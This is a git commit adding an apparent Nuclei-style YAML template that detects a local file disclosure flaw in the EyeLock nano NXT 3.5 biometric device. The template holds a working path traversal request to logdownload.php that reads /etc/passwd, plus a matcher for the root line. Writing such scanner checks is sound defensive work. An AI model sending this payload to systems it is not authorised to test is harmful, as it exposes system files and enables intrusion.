Create eyelock-nano-lfd.yaml

patch-1
Prince Chaddha 2021-08-16 16:12:45 +05:30 committed by GitHub
parent 232b187a40
commit c6927262eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Local File Disclosure
description:
author: geeknik
reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
severity: high
tags: eyelock,lfd,traversal,iot,biometrics
requests:
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body